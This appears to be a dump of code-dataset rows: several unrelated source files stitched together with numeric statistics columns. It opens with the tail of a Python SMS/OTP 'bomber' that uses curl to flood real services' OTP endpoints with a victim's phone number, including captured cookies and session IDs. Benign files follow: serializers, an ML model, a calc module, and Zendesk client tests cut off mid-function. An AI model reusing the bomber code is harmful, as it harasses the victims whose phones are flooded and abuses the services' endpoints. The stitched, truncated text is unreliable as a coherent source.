G_ENABLED_IDPS=google; _ga=GA1.2.197673884.1605949721; _gid=GA1.2.2011551121.1605949721; _gcl_au=1.1.1284674085.1605949721; _gat=1; _fbp=fb.1.1605949725797.872815084; _fw_crm_v=96418cad-5ce4-4609-9b0d-fe1684f16041; cto_bundle=q-RBWF9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzelBlWklIZnMxVm1ycVBzVk5jMzYwUkRBdVg4ek80SUQxeU9aZ0dseG5vQWwybXVWcWo5YyUyQnFvdmJjb1FWVzAzRTdWc0tiYWFVcVpMbGhrZjQ1YWdFZyUyRk0lMkJ5b05Oa01NWjc5eTN1dlNVejYxbkNOZnE2dHolMkZsdkduUkE4Wmd5dldNNzRUN3JoeExtJTJCYiUyQnM5b21heUlTayUzRA' -H 'TE: Trailers' --data-raw 'phone='''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.rentomojo.com/api/RMUsers/isNumberRegistered' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.rentomojo.com/mumbai' -H 'Content-Type: application/json;charset=utf-8' -H 'withCredentials: true' -H 'rm-client-name: client-web' -H 'rm-client-version: 13' -H 'sessionId: session-1605949938685-m3gdsh' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=dc4d85924d916df7e7a1b0a144b53e7ca1605949883; _vwo_uuid_v2=D6637B29EA9F6B29E349BE7B36096648B|a6e3521c930dd63de2922bba16e60703; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; _fbp=fb.1.1605949941784.2068999659; RT="sl=1&ss=1605949935544&tt=6520&obo=0&bcn=%2F%2F684fc53d.akstat.io%2F&sh=1605949942097%3D1%3A0%3A6520&dm=rentomojo.com&si=b0f64679-2212-4b3a-849d-fa2bdf60c9bf&ld=1605949942098&nu=https%3A%2F%2Fwww.rentomojo.com%2Fmumbai&cl=1605949947187"; _omappvp=EALX5XEd4a4qcO6gOTPpfl4VAbxfohcMBKZSynGfkno8kj7RX8j7LBBDlRGaMghvw8oDawMVPVNWmwBfIi50PJd4omnXGgfR; _omappvs=1605949942522; ajs_anonymous_id=%22c41f25db-40aa-4822-ace8-c8ebcc86ca78%22; _ga=GA1.2.1866039672.1605949944; _gid=GA1.2.1973545038.1605949944; mp_7dc5e475653b5ae6dfca58e1402254b7_mixpanel=%7B%22distinct_id%22%3A%20%22175ea1370f69-025b917de2c71-31634645-e0716-175ea1370f887%22%2C%22%24device_id%22%3A%20%22175ea1370f69-025b917de2c71-31634645-e0716-175ea1370f887%22%2C%22%24search_engine%22%3A%20%22google%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fwww.google.com%2F%22%2C%22%24initial_referring_domain%22%3A%20%22www.google.com%22%7D; _uetsid=abcfa2302bd911eb88efb1f42010fd8e; _uetvid=abd091102bd911eb98ffc7a73299af54; SETUP_TIME=1605949947483; USER_DATA=%7B%22attributes%22%3A%5B%5D%2C%22subscribedToOldSdk%22%3Afalse%2C%22deviceUuid%22%3A%220b6072b7-159a-4a07-8bbf-65ba53500e35%22%2C%22deviceAdded%22%3Afalse%7D; moe_uuid=0b6072b7-159a-4a07-8bbf-65ba53500e35; _gat=1; cto_bundle=vlqVZl9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzek8yWkpaeDRNbyUyRkpKcFNZMkxGdzlCUVY1REh1SWdXSVVPeFgwVlRkWExFWUxjNVVzV1QzdVdoVWdKJTJGZ3QwWDNPSGMzRnNpckpvNHNtSEVLd0NHbm5ad0Rpa3laTjRpRHZ2TWtiZzFxU3FMbmtjUlc4ZVRMJTJCUUVYUSUyRjhnTEo5cVQ5UG1kS1hnYlVUQXNkdHZFWVpTcUs5VDJyVU5XeWVvVTFxSVR2WEY0aEpu' -H 'TE: Trailers' --data-raw '{"mobileNumber":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://orders.crisfood.com/api/api/user/otp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://orders.crisfood.com/register?redirect_to=' -H 'Content-Type: application/json;charset=utf-8' -H 'Connection: keep-alive' --data-raw '{"phone":"+91'''+target+'''"}' > /dev/null 2>&1
''')
if choose == 2:
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.yellow + "See you later")
exit()
else:
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Invalid Option")
except KeyboardInterrupt:
print(Colours.green + "[" + Colours.yellow + "+" +Colours.green + "]" + Colours.yellow + "STOPPING BOMBER!")
exit()
| 348.224138 | 4,834 | 0.779819 | 9,475 | 80,788 | 6.54248 | 0.265646 | 0.011179 | 0.006824 | 0.012615 | 0.320116 | 0.283659 | 0.252266 | 0.22936 | 0.216099 | 0.190337 | 0 | 0.201955 | 0.074504 | 80,788 | 231 | 4,835 | 349.731602 | 0.626944 | 0 | 0 | 0.520737 | 0 | 0.281106 | 0.93088 | 0.591407 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.018433 | 0.009217 | 0 | 0.059908 | 0.133641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f014d8a14d6e1c5eeb7e6fd6f039f45b924fd1b5 | 139 | py | Python | netbox/secrets/exceptions.py | 0xAalaoui/netbox | 07364abf9e9ff193bad49b790e657382cf186f0c | [
"Apache-2.0"
] | 1 | 2020-07-16T17:50:31.000Z | 2020-07-16T17:50:31.000Z | netbox/secrets/exceptions.py | 0xAalaoui/netbox | 07364abf9e9ff193bad49b790e657382cf186f0c | [
"Apache-2.0"
] | 9 | 2019-01-20T08:35:13.000Z | 2022-03-12T00:50:13.000Z | netbox/secrets/exceptions.py | 0xAalaoui/netbox | 07364abf9e9ff193bad49b790e657382cf186f0c | [
"Apache-2.0"
] | 1 | 2021-04-09T06:08:21.000Z | 2021-04-09T06:08:21.000Z | from __future__ import unicode_literals
class InvalidKey(Exception):
"""
Raised when a provided key is invalid.
"""
pass
| 15.444444 | 42 | 0.683453 | 16 | 139 | 5.625 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244604 | 139 | 8 | 43 | 17.375 | 0.857143 | 0.273381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f0425e21c51effdff92c4f7dd7740bd5681c68f7 | 3,224 | py | Python | examples/property_prediction/MTL/model/attentivefp.py | siboehm/dgl-lifesci | f8a176414b21b72c5ca1f8c7eb8d64702432ae24 | [
"Apache-2.0"
] | 390 | 2020-06-05T13:16:18.000Z | 2022-03-31T07:36:34.000Z | examples/property_prediction/MTL/model/attentivefp.py | siboehm/dgl-lifesci | f8a176414b21b72c5ca1f8c7eb8d64702432ae24 | [
"Apache-2.0"
] | 71 | 2020-06-12T05:26:56.000Z | 2022-03-29T06:26:39.000Z | examples/property_prediction/MTL/model/attentivefp.py | siboehm/dgl-lifesci | f8a176414b21b72c5ca1f8c7eb8d64702432ae24 | [
"Apache-2.0"
] | 113 | 2020-06-08T18:48:18.000Z | 2022-03-22T01:16:26.000Z | import torch.nn as nn
from dgllife.model import AttentiveFPGNN, AttentiveFPReadout
from .regressor import BaseGNNRegressor, BaseGNNRegressorBypass
class AttentiveFPRegressor(BaseGNNRegressor):
"""AttentiveFP-based model for multitask molecular property prediction.
We assume all tasks are regression problems.
Parameters
----------
in_node_feats : int
Number of input node features
in_edge_feats : int
Number of input edge features
gnn_out_feats : int
The GNN output size
num_layers : int
Number of GNN layers
num_timesteps : int
Number of timesteps for updating molecular representations with GRU during readout
n_tasks : int
Number of prediction tasks
regressor_hidden_feats : int
Hidden size in MLP regressor
dropout : float
The probability for dropout. Default to 0, i.e. no dropout is performed.
"""
def __init__(self, in_node_feats, in_edge_feats, gnn_out_feats, num_layers, num_timesteps,
n_tasks, regressor_hidden_feats=128, dropout=0.):
super(AttentiveFPRegressor, self).__init__(readout_feats=gnn_out_feats,
n_tasks=n_tasks,
regressor_hidden_feats=regressor_hidden_feats,
dropout=dropout)
self.gnn = AttentiveFPGNN(in_node_feats, in_edge_feats, num_layers,
gnn_out_feats, dropout)
self.readout = AttentiveFPReadout(gnn_out_feats, num_timesteps, dropout)
class AttentiveFPRegressorBypass(BaseGNNRegressorBypass):
"""AttentiveFP-based model for bypass multitask molecular property prediction.
We assume all tasks are regression problems.
Parameters
----------
in_node_feats : int
Number of input node features
in_edge_feats : int
Number of input edge features
gnn_out_feats : int
The GNN output size
num_layers : int
Number of GNN layers
num_timesteps : int
Number of timesteps for updating molecular representations with GRU during readout
n_tasks : int
Number of prediction tasks
regressor_hidden_feats : int
Hidden size in MLP regressor
dropout : float
The probability for dropout. Default to 0, i.e. no dropout is performed.
"""
def __init__(self, in_node_feats, in_edge_feats, gnn_out_feats, num_layers, num_timesteps,
n_tasks, regressor_hidden_feats=128, dropout=0.):
super(AttentiveFPRegressorBypass, self).__init__(
readout_feats= 2 * gnn_out_feats, n_tasks=n_tasks,
regressor_hidden_feats=regressor_hidden_feats,
dropout=dropout)
self.shared_gnn = AttentiveFPGNN(in_node_feats, in_edge_feats, num_layers,
gnn_out_feats, dropout)
for _ in range(n_tasks):
self.task_gnns.append(AttentiveFPGNN(in_node_feats, in_edge_feats, num_layers,
gnn_out_feats, dropout))
self.readouts.append(AttentiveFPReadout(2 * gnn_out_feats, num_timesteps, dropout))
| 42.986667 | 97 | 0.656638 | 375 | 3,224 | 5.354667 | 0.213333 | 0.032869 | 0.060259 | 0.074701 | 0.770418 | 0.770418 | 0.740538 | 0.740538 | 0.740538 | 0.740538 | 0 | 0.005238 | 0.289392 | 3,224 | 74 | 98 | 43.567568 | 0.871235 | 0.397643 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.115385 | 0.115385 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
f05a058adadb38a542dc75d8516316f58d54a7da | 10,651 | py | Python | authors/apps/articles/serializers.py | andela/ah-backend-odin | 0e9ef1a10c8a3f6736999a5111736f7bd7236689 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/articles/serializers.py | andela/ah-backend-odin | 0e9ef1a10c8a3f6736999a5111736f7bd7236689 | [
"BSD-3-Clause"
] | 43 | 2018-10-25T10:14:52.000Z | 2022-03-11T23:33:46.000Z | authors/apps/articles/serializers.py | andela/ah-backend-odin | 0e9ef1a10c8a3f6736999a5111736f7bd7236689 | [
"BSD-3-Clause"
] | 4 | 2018-10-29T07:04:58.000Z | 2020-04-02T14:15:10.000Z | from rest_framework import serializers
from ..authentication.models import User
from .models import (Article,
ArticleLikes,
Thread,
Comment,
FavoriteArticle,
Rating,
LikeComment,
BookmarkingArticles,)
from rest_framework.validators import UniqueTogetherValidator
from ..authentication.serializers import UserSerializer
from taggit_serializer.serializers import (TagListSerializerField,
TaggitSerializer)
class CreateArticleAPIViewSerializer(TaggitSerializer, serializers.ModelSerializer):
tagList = TagListSerializerField()
author = serializers.SerializerMethodField()
def get_author(self, obj):
user = {
"username": obj.author.username,
"email": obj.author.email
}
return user
class Meta:
model = Article
fields = ['title', 'description', 'body', 'author',
'created_at', 'updated_at', 'tagList', 'slug', 'published', 'image', 'likescount', 'dislikescount', 'read_time', 'average_rating']
def validate_title(self, value):
if len(value) > 50:
raise serializers.ValidationError(
'The title should not be more than 50 characters'
)
return value
def validate_description(self, value):
if len(value) > 200:
raise serializers.ValidationError(
'The article should not be more than 200 characters'
)
return value
class ArticleDetailSerializer(serializers.ModelSerializer):
tagList = TagListSerializerField()
author = serializers.SerializerMethodField()
def get_author(self, obj):
user = {
"username": obj.author.username,
"email": obj.author.email
}
return user
class Meta:
model = Article
fields = ['title', 'description', 'body', 'author',
'created_at', 'updated_at', 'tagList',
'slug', 'published', 'image', 'likescount', 'dislikescount', 'read_time', 'comments', 'average_rating']
class UpdateArticleAPIVIEWSerializer(serializers.ModelSerializer):
class Meta:
model = Article
fields = ['title', 'description', 'body', 'author',
'created_at', 'updated_at', 'tagList', 'slug', 'published', 'image', 'read_time', 'average_rating']
def validate_title(self, value):
if len(value) > 50:
raise serializers.ValidationError(
'The title should not be more than 50 characters'
)
return value
def validate_description(self, value):
if len(value) > 200:
raise serializers.ValidationError(
'The article should not be more than 200 characters'
)
return value
def update_article(self, validated_data, article_instance):
article_instance.title = validated_data.get('title')
article_instance.body = validated_data.get('body')
article_instance.description = validated_data.get('description')
article_instance.image = validated_data.get('image')
article_instance.tagList = validated_data.get('tagList')
article_instance.save()
return article_instance
class LikeArticleAPIViewSerializer(serializers.ModelSerializer):
action_performed = "created"
class Meta:
model = ArticleLikes
fields = ['author', 'article', 'article_like']
def create(self, validated_data):
try: # pragma: no cover
self.instance = ArticleLikes.objects.filter(author=validated_data["author"].id)[
0:1].get()
except ArticleLikes.DoesNotExist: # pragma: no cover
return ArticleLikes.objects.create(**validated_data)
self.perform_update(validated_data)
return self.instance
def perform_update(self, validated_data):
if self.instance.article_like == validated_data["article_like"]:
self.instance.delete()
self.action_performed = "deleted"
else:
self.instance.article_like = validated_data["article_like"]
self.instance.save()
self.action_performed = "updated"
class FavoriteArticlesSerializer(serializers.ModelSerializer):
class Meta:
model = FavoriteArticle
fields = ('article', 'favorite_status', 'author',
'favorited_at', 'last_updated_at')
class CreateCommentAPIViewSerializer(serializers.ModelSerializer):
author = UserSerializer(read_only=True)
class Meta:
model = Comment
fields = ('id', 'body', 'article',
'createdAt', 'updatedAt', 'author', )
read_only_fields = ('article', )
def validate(self, data):
comment = data.get('body', None)
if len(comment) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment,
}
def create(self, validated_data):
author = self.context["author"]
article = self.context["article"]
body = validated_data.get('body')
# return Comment.objects.create(body=body, article=article)
return Comment.objects.create(body=body, author=author, article=article)
class CreateThreadAPIViewSerializer(serializers.ModelSerializer):
class Meta:
model = Thread
fields = ('id', 'body', 'author', 'comment', 'createdAt', 'updatedAt')
read_only_fields = ('author', 'comment', )
def validate(self, data):
comment_thread = data.get('body', None)
if len(comment_thread) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment_thread,
}
def create(self, validated_data):
author = self.context["author"]
comment = self.context["comment"]
body = validated_data.get('body')
return Thread.objects.create(body=body, author=author, comment=comment)
class RatingsSerializer(serializers.ModelSerializer):
class Meta:
model = Rating
fields = ['id', 'article', 'article_rate', 'author']
validators = [UniqueTogetherValidator(
queryset=Rating.objects.all(),
fields=('article', 'author',),
message=("You cannot rate this article more than once")
)]
class LikeArticleAPIViewSerializer(serializers.ModelSerializer):
action_performed = "created"
class Meta:
model = ArticleLikes
fields = ['author', 'article', 'article_like']
def create(self, validated_data):
try:
self.instance = ArticleLikes.objects.filter(author=validated_data["author"].id)[
0:1].get()
except ArticleLikes.DoesNotExist:
return ArticleLikes.objects.create(**validated_data)
self.perform_update(validated_data)
return self.instance
def perform_update(self, validated_data):
if self.instance.article_like == validated_data["article_like"]:
self.instance.delete()
self.action_performed = "deleted"
else:
self.instance.article_like = validated_data["article_like"]
self.instance.save()
self.action_performed = "updated"
class FavoriteArticlesSerializer(serializers.ModelSerializer):
class Meta:
model = FavoriteArticle
fields = ('article', 'favorite_status', 'author',
'favorited_at', 'last_updated_at')
class CreateCommentAPIViewSerializer(serializers.ModelSerializer):
author = UserSerializer(read_only=True)
class Meta:
model = Comment
fields = ('id', 'body', 'article', 'createdAt', 'updatedAt',
'author', 'commentlikescount', 'commentdislikescount')
read_only_fields = ('article', )
def validate(self, data):
comment = data.get('body', None)
if len(comment) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment,
}
def create(self, validated_data):
author = self.context["author"]
article = self.context["article"]
body = validated_data.get('body')
return Comment.objects.create(body=body, author=author, article=article)
class CreateThreadAPIViewSerializer(serializers.ModelSerializer):
class Meta:
model = Thread
fields = ('id', 'body', 'author', 'comment', 'createdAt', 'updatedAt')
read_only_fields = ('author', 'comment', )
def validate(self, data):
comment_thread = data.get('body', None)
if len(comment_thread) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment_thread,
}
def create(self, validated_data):
author = self.context["author"]
comment = self.context["comment"]
body = validated_data.get('body')
return Thread.objects.create(body=body, author=author, comment=comment)
class CommentLikeSerializer(serializers.ModelSerializer):
class Meta:
model = LikeComment
fields = ['author', 'comment', 'like_status']
def create(self, validated_data):
try:
self.instance = LikeComment.objects.filter(author=validated_data["author"],
comment=validated_data["comment"])[0:1].get()
except LikeComment.DoesNotExist:
return LikeComment.objects.create(**validated_data)
self.perform_update(validated_data)
return self.instance
def perform_update(self, validated_data):
if self.instance.like_status == validated_data["like_status"]:
self.instance.delete()
else:
self.instance.like_status = validated_data["like_status"]
self.instance.save()
class BookmarkSerializer(serializers.ModelSerializer):
user = serializers.ReadOnlyField(source="user.username")
article_id = serializers.ReadOnlyField(source="article_id.title")
class Meta:
model = BookmarkingArticles
fields = ['user', 'article_id', 'bookmarked_at']
| 31.699405 | 148 | 0.612712 | 987 | 10,651 | 6.488349 | 0.129686 | 0.073079 | 0.030606 | 0.038257 | 0.782636 | 0.762336 | 0.756402 | 0.756402 | 0.75 | 0.75 | 0 | 0.004457 | 0.283729 | 10,651 | 335 | 149 | 31.79403 | 0.834972 | 0.008544 | 0 | 0.720648 | 0 | 0 | 0.144847 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08502 | false | 0 | 0.024292 | 0 | 0.348178 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f07e35f8cb9915996c7d9dec8221534d9613bbc1 | 129 | py | Python | app/app/calc.py | david-alejandro-reyes-milian/recipe-app-api | 12caaaceff0ed13cfea6e25c57773d3afe24cf68 | [
"MIT"
] | null | null | null | app/app/calc.py | david-alejandro-reyes-milian/recipe-app-api | 12caaaceff0ed13cfea6e25c57773d3afe24cf68 | [
"MIT"
] | null | null | null | app/app/calc.py | david-alejandro-reyes-milian/recipe-app-api | 12caaaceff0ed13cfea6e25c57773d3afe24cf68 | [
"MIT"
] | null | null | null | def add(x: int, y: int) -> int:
"""Add 2 numbers"""
return x + y
def subtract(x: int, y: int) -> int:
return x - y
| 16.125 | 36 | 0.511628 | 23 | 129 | 2.869565 | 0.391304 | 0.121212 | 0.151515 | 0.242424 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011111 | 0.302326 | 129 | 7 | 37 | 18.428571 | 0.722222 | 0.100775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
b2b2ae644b9294c2c8008a759e447d9c369ab88b | 24,048 | py | Python | tests/app/clients/test_zendesk_sell.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | 41 | 2019-11-28T16:58:41.000Z | 2022-01-28T21:11:16.000Z | tests/app/clients/test_zendesk_sell.py | cds-snc/notification-api | b1c1064f291eb860b494c3fa65ac256ad70bf47c | [
"MIT"
] | 1,083 | 2019-07-08T12:57:24.000Z | 2022-03-08T18:53:40.000Z | tests/app/clients/test_zendesk_sell.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | 9 | 2020-01-24T19:56:43.000Z | 2022-01-27T21:36:53.000Z | import json
from typing import Any, Dict, Optional, Union
import pytest
import requests_mock
from flask import Flask
from pytest_mock import MockFixture
from app.clients.zendesk_sell import ZenDeskSell
from app.models import Service
from app.user.contact_request import ContactRequest
def test_create_lead(notify_api: Flask):
def match_json(request):
expected = {
"data": {
"last_name": "User",
"first_name": "Test",
"organization_name": "",
"email": "test@email.com",
"description": "Program: \n: ",
"tags": ["", "en"],
"status": "New",
"source_id": 2085874,
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {
"Product": ["Notify"],
"Intended recipients": "No value",
},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/leads/upsert?email=test@email.com",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=201,
)
with notify_api.app_context():
response = ZenDeskSell().upsert_lead(ContactRequest(email_address="test@email.com", name="Test User"))
assert response == 201
def test_create_lead_missing_name(notify_api: Flask):
# Name field is a requirement for the zendesk sell API interface
with notify_api.app_context():
with pytest.raises(AssertionError):
ZenDeskSell().upsert_lead(ContactRequest(email_address="test@email.com"))
def generate_contact_url(existing_contact_id: Optional[str], service: Service) -> str:
if existing_contact_id:
return f"https://zendesksell-test.com/v2/contacts/{existing_contact_id}"
else:
return f"https://zendesksell-test.com/v2/contacts/upsert?" f"custom_fields[notify_user_id]={str(service.users[0].id)}"
def contact_http_method(existing_contact_id: Optional[str]):
return "PUT" if existing_contact_id else "POST"
@pytest.mark.parametrize(
"existing_contact_id,created_at,updated_at,expected_created",
[
(None, "2021-03-24T14:49:38Z", "2021-03-24T14:49:38Z", True),
(None, "2021-03-24T14:49:38Z", "2021-04-24T14:49:38Z", False),
("1", "2021-03-24T14:49:38Z", "2021-04-24T14:49:38Z", False),
],
)
def test_create_or_upsert_contact(
existing_contact_id: Optional[str],
created_at: str,
updated_at: str,
expected_created: bool,
notify_api: Flask,
sample_service: Service,
):
def match_json(request):
expected = {
"data": {
"last_name": "User",
"first_name": "Test",
"email": "notify@digital.cabinet-office.gov.uk",
"mobile": "+16502532222",
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_user_id": str(sample_service.users[0].id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
expected_contact_id = existing_contact_id or "123456789"
resp_data = {
"data": {
"id": expected_contact_id,
"created_at": created_at,
"updated_at": updated_at,
}
}
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(resp_data),
)
with notify_api.app_context():
contact_id, is_created = ZenDeskSell().upsert_contact(sample_service.users[0], existing_contact_id)
assert expected_contact_id == contact_id
assert is_created == expected_created
@pytest.mark.parametrize(
"existing_contact_id,expected_resp_data",
[
(None, {"blank": "blank"}),
(
None,
{
"data": {
"created_at": "2021-02-24T14:49:38Z",
"updated_at": "2021-03-24T14:49:38Z",
}
},
),
(None, {"data": {"id": "123456789", "created_at": "2021-02-24T14:49:38Z"}}),
(None, {"data": {"id": "123456789", "updated_at": "2021-02-24T14:49:38Z"}}),
(1, {"blank": "blank"}),
(
1,
{
"data": {
"created_at": "2021-02-24T14:49:38Z",
"updated_at": "2021-03-24T14:49:38Z",
}
},
),
(1, {"data": {"id": "123456789", "created_at": "2021-02-24T14:49:38Z"}}),
(1, {"data": {"id": "123456789", "updated_at": "2021-02-24T14:49:38Z"}}),
],
)
def test_create_contact_invalid_response(
notify_api: Flask,
sample_service: Service,
existing_contact_id: Optional[str],
expected_resp_data: Dict[str, Dict[str, Union[int, str]]],
):
def match_json(request):
expected = {
"data": {
"last_name": "User",
"first_name": "Test",
"email": "notify@digital.cabinet-office.gov.uk",
"mobile": "+16502532222",
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_user_id": str(sample_service.users[0].id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(expected_resp_data),
)
with notify_api.app_context():
contact_id, _ = ZenDeskSell().upsert_contact(sample_service.users[0], existing_contact_id)
assert not contact_id
def test_convert_lead_to_contact(notify_api: Flask, sample_service: Service):
lead_id = "123456789"
def match_json(request):
expected = {
"data": {
"lead_id": lead_id,
"owner_id": ZenDeskSell.OWNER_ID,
"create_deal": False,
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
expected_contact_id = "1234567890"
rmock.request(
"GET",
url=f"https://zendesksell-test.com/v2/leads?email={sample_service.users[0].email_address}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps({"items": [{"data": {"id": lead_id}}]}),
)
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/lead_conversions",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps({"data": {"individual_id": expected_contact_id}}),
)
with notify_api.app_context():
contact_id = ZenDeskSell().convert_lead_to_contact(sample_service.users[0])
assert contact_id == expected_contact_id
def test_convert_lead_to_contact_search_fails(notify_api: Flask, sample_service: Service, mocker: MockFixture):
with notify_api.app_context():
search_lead_id_mock = mocker.patch("app.user.rest.ZenDeskSell.search_lead_id", return_value=None)
contact_id = ZenDeskSell().convert_lead_to_contact(sample_service.users[0])
search_lead_id_mock.assert_called_once_with(sample_service.users[0])
assert not contact_id
def test_delete_contact(notify_api: Flask):
def match_header(request):
return request.headers.get("Authorization") == "Bearer zendesksell-api-key"
with requests_mock.mock() as rmock:
contact_id = "123456789"
rmock.request(
"DELETE",
url=f"https://zendesksell-test.com/v2/contacts/{contact_id}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_header,
status_code=200,
)
with notify_api.app_context():
# as long as it doesn't throw we are OK as this is a best effort method
ZenDeskSell().delete_contact(contact_id)
def test_create_deal(notify_api: Flask, sample_service: Service):
def match_json(request):
expected = {
"data": {
"contact_id": "123456789",
"name": "Sample service",
"stage_id": 123456789,
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_service_id": str(sample_service.id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
contact_id = "123456789"
expected_deal_id = "987654321"
resp_data = {"data": {"id": expected_deal_id, "contact_id": contact_id}}
rmock.request(
"POST",
url=f"https://zendesksell-test.com/v2/deals/upsert?" f"custom_fields[notify_service_id]={str(sample_service.id)}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(resp_data),
)
with notify_api.app_context():
deal_id = ZenDeskSell().upsert_deal(contact_id, sample_service, 123456789)
assert expected_deal_id == deal_id
@pytest.mark.parametrize(
"expected_resp_data",
[
{"blank": "blank"},
{"data": {"blank": "blank"}},
],
)
def test_create_deal_invalid_response(
notify_api: Flask,
sample_service: Service,
expected_resp_data: Dict[str, Dict[str, Union[int, str]]],
):
def match_json(request):
expected = {
"data": {
"contact_id": "123456789",
"name": "Sample service",
"stage_id": 123456789,
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_service_id": str(sample_service.id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
contact_id = "123456789"
rmock.request(
"POST",
url=f"https://zendesksell-test.com/v2/deals/upsert?" f"custom_fields[notify_service_id]={str(sample_service.id)}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(expected_resp_data),
)
with notify_api.app_context():
deal_id = ZenDeskSell().upsert_deal(contact_id, sample_service, 123456789)
assert not deal_id
def test_create_note(notify_api: Flask):
resource_id = "1"
def match_json(request):
expected = {
"data": {
